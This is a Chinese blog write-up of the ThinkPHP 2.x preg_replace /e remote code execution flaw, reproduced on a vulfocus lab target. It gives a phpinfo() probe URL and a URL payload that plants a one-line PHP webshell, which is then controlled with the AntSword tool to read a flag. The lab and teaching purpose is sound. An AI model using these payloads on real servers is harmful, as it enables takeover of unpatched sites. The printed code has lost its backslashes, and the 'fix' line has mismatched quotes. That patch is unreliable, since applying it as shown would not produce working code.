thinkphp-2x-rce 代码执行
2021/8/20 1:05:44
本文主要是介绍thinkphp-2x-rce 代码执行,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
thinkphp-2x-rce 代码执行
漏洞描述
ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞
影响版本
Thinkphp 2.x的版本
实验环境
攻击机:win10
靶机:vulfocus平台 thinkphp-2x-rce 代码执行
漏洞复现
首先打开靶机 vulfocus平台 thinkphp-2x-rce 代码执行
根据漏洞的描述 是preg_replace的/e模式匹配路由
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2";', implode($depr,$paths));
直接访问
/a/b/c/${@phpinfo()} 打开phpinfo
构建payload :
/a/b/c/${@print(($_POST[1]))} // 一句话木马
打开蚁剑 进行连接 然后就可以直接在tmp文件下找到flag
原理
首先百度了一下什么是 PHP preg_replace() 函数
preg_replace :函数执行一个正则表达式的搜索和替换。
preg_replace的/e修饰符的解释
修复方案
将Dispatcher.class.php文件中的代码
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2";', implode($depr,$paths));
修改为
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'/]+)@e', '$var['1']="2';', implode($depr,$paths));
这篇关于thinkphp-2x-rce 代码执行的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-03-29env: php: no such file or directory
- 2024-03-01php foreach break
- 2024-02-26Exception参数 php-icode9专业技术文章分享
- 2023-12-30PHP文件批量上传-icode9专业技术文章分享
- 2023-12-30thinkphp6 withJoin-icode9专业技术文章分享
- 2023-12-27MagicArray:像php一样,让Go业务代码不再卷!
- 2023-11-18centos7编译安装PHP教程。
- 2023-11-18centos7编译安装phpMyAdmin教程。
- 2023-10-13唱衰这么多年,PHP 仍然还是你大爷!
- 2023-07-25PHP8,性能更好,语法更好,类型安全更完善